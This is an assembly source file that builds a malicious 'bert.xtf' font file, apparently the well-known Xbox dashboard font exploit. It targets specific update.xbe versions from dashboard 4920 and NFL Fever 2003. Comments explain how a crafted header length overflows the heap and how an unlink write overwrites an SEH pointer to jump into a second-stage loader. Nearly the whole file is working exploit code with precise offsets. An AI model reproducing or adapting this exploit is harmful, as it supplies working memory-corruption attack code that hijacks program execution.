;;;
;;; Compile example:
;;; 
;;; nasm -dVER_NFLFEVERUS -o bert.xtf bert-generic.asm
;;;

		BITS 32


header:	
		db 'XTF0'
		dd 32
		db 'Xbox Book'
		times 32-9 db 0
.data1len	dd 2
		dd 0
.data2num	dd 0
		dd 0
		dw 2, 2
		jmp short prestart
		dw 0


.value:
%ifdef VER_NFLFEVERUS
		dd 21911h	; NFL Fever 2003 US/CANADA
%elifdef VER_1914880
		dd 21A59h	; update.xbe with file size 1914880
%elifdef VER_1974272
		dd 219AEh	; update.xbe with file size 1974272
%else
	%error You need to define for which update.xbe version to compile for!
%endif

	
; .address	dd 0D0032DC0h	; BIOS loaded using PBL
.address	dd 0D004CDC0h	; BIOS loaded at boot


prestart:
%ifdef VER_NFLFEVERUS
	push	155A4h
	mov	eax,29A2Ah
%elifdef VER_1914880
	push	155A4h
	mov	eax,29B3Eh
%elifdef VER_1974272
	push	15594h		; "Xbox" in 16-bit unicode
	mov	eax,29DFAh
%endif

	call	eax		; load ernie
	jmp	dword [eax+8]	; jump to ernie


;;;
;;; Details for supported update.xbe files:
;;;
;;;     * MS dashboard 4920 with directory xboxdashdata.10027100
;;;       - update.xbe has file size 1914880 and md5sum
;;;         73402a42463766842e56e82b839d5669.
;;;       - only works with kernels 5530 and less.
;;;       - define VER_1914880 to compile for this version.
;;;
;;;     * MS dashboard 4920 with directory xboxdashdata.1012A700
;;;       - update.xbe has file size 1974272 and md5sum
;;;         8ab653c39f555758fb65d9014928c4cd.
;;;       - only works with kernels 5530 and less.
;;;       - define VER_1974272 to compile for this version.
;;;
;;;     * The game NFL Fever 2003 !Live content has (had) an update.xbe:
;;;       - update.xbe has file size 1916928 and md5sum
;;;         b2875da022264e19107db4fb1f7af1db.
;;;       - works with all kernels (3944-5838).
;;;       - only for US/CANADA region.
;;;       - define VER_NFLFEVERUS to compile for this version.
;;; 
;;; 
;;; The following description applies to update.xbe with size 1974272:
;;; 
;;; At one point Dashboard 4920 update.xbe allocates header.data1len amount
;;; of memory (call at memory address 0x2efb5) and then reads
;;; header.data1len-4 bytes of data from bert.xtf. Data will
;;; overflow to the heap arena of the next memory block and beyond.
;;; 
;;; At memory address 0x1a6e3 are the instructions
;;; 
;;; 1a6e3:	89 0a                	mov    %ecx,(%edx)
;;; 1a6e5:	89 51 04             	mov    %edx,0x4(%ecx)
;;;
;;; %edx has been loaded with header.address and %ecx with header.value.
;;; header.address is chosen such that it points to a pointer to an SEH
;;; of the thread handling the font file bert.xtf.
;;;
;;; Execution may also take a slightly different path, but still encounter
;;; the same pair of instructions:
;;; 
;;; 1a78a:	89 0a                	mov    %ecx,(%edx)
;;; 1a78c:	89 51 04             	mov    %edx,0x4(%ecx)
;;;
